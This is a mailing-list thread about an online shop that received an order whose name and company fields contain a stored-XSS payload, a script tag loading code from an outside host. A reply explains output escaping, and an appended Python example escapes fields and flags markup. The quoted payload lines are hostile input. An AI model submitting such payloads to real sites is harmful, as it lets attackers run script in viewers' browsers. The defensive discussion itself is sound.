
xss issue?
I received an order with stuff like this

Name: Linda Juan">script src=//xss.re/692>/script>
Company: ">script src=//xss.re/692>/script>
Email address: juanlinda123@gmail.com

I'm using 5.10 and a modified foundation. The payment method was
check/money order. I'm hoping to prevent this of course. Adding a
[filter] to input fields on the order form is the first thing that comes
to mind. Is that a reasonable solution?

DB

_______________________________________________
interchange-users mailing list
interchange-users@icdevgroup.org
http://www.icdevgroup.org/mailman/listinfo/interchange-users
Re: xss issue?
Quoting DB (db@m-and-d.com):
> I received an order with stuff like this
>
> Name: Linda Juan">script src=//xss.re/692>/script>
> Company: ">script src=//xss.re/692>/script>
> Email address: juanlinda123@gmail.com
>
> I'm using 5.10 and a modified foundation. The payment method was
> check/money order. I'm hoping to prevent this of course. Adding a
> [filter] to input fields on the order form is the first thing that comes
> to mind. Is that a reasonable solution?

Actually, if your order report email is using the [value] tags, it
automatically escapes HTML.

See the last section on this page:
http://www.icdevgroup.org/interchange-doc-5.2.0/frames/ictags_120.html

For reference, here is the default Strap order report:
https://github.com/interchange/interchange/blob/master/dist/strap/etc/report

You may need to compare to what your site is using.

Using [value] will prevent XSS, but to prevent the submissions
altogether is another story... You'd probably need to have an "online"
check payment option, so that at least the orders that make it through
would be using a real bank account (or a stolen one!).

--
Josh Lavin
End Point Corporation
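
As an added illustration (a Python stand-in written for this thread, not Interchange's own code), the block below mimics the HTML escaping the reply attributes to the [value] tag in an order-report template, and adds a check that flags orders whose customer fields contain markup so they can be reviewed rather than shipped. The template placeholder syntax, field names and sample order are constructed; the domain is a placeholder.

```python
import html
import re

# Constructed sample order, modelled on the fields quoted in the thread.
# The hostname is a placeholder, not the one from the original report.
SAMPLE_ORDER = {
    "fname": 'Linda Juan"><script src=//example.invalid/x></script>',
    "company": '"><script src=//example.invalid/x></script>',
    "email": "customer@example.invalid",
}

# Constructed report template using [value NAME] placeholders, the way the
# reply describes the order report pulling in submitted form values.
TEMPLATE = """Name: [value fname]
Company: [value company]
Email address: [value email]
"""

# Anything that looks like a tag, a URL scheme handler or an event handler
# attribute has no business in a name or company field.
MARKUP_RE = re.compile(r"<\s*/?\s*\w+|javascript:|on\w+\s*=", re.IGNORECASE)


def escape_field(value: str) -> str:
    """Escape <, >, &, and both quote characters so a submitted value is
    rendered as text when the report is viewed as HTML."""
    return html.escape(value, quote=True)


def render_report(order: dict, template: str = TEMPLATE) -> str:
    """Substitute each [value NAME] placeholder with the escaped field.
    Missing fields render as empty strings."""
    def sub(match: re.Match) -> str:
        return escape_field(order.get(match.group(1), ""))
    return re.sub(r"\[value (\w+)\]", sub, template)


def flag_markup(order: dict) -> list:
    """Return the names of fields containing markup, sorted, so the order
    can be held for manual review instead of being processed."""
    return sorted(name for name, value in order.items() if MARKUP_RE.search(value))


if __name__ == "__main__":
    print(render_report(SAMPLE_ORDER))
    print("fields to review:", flag_markup(SAMPLE_ORDER))
```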
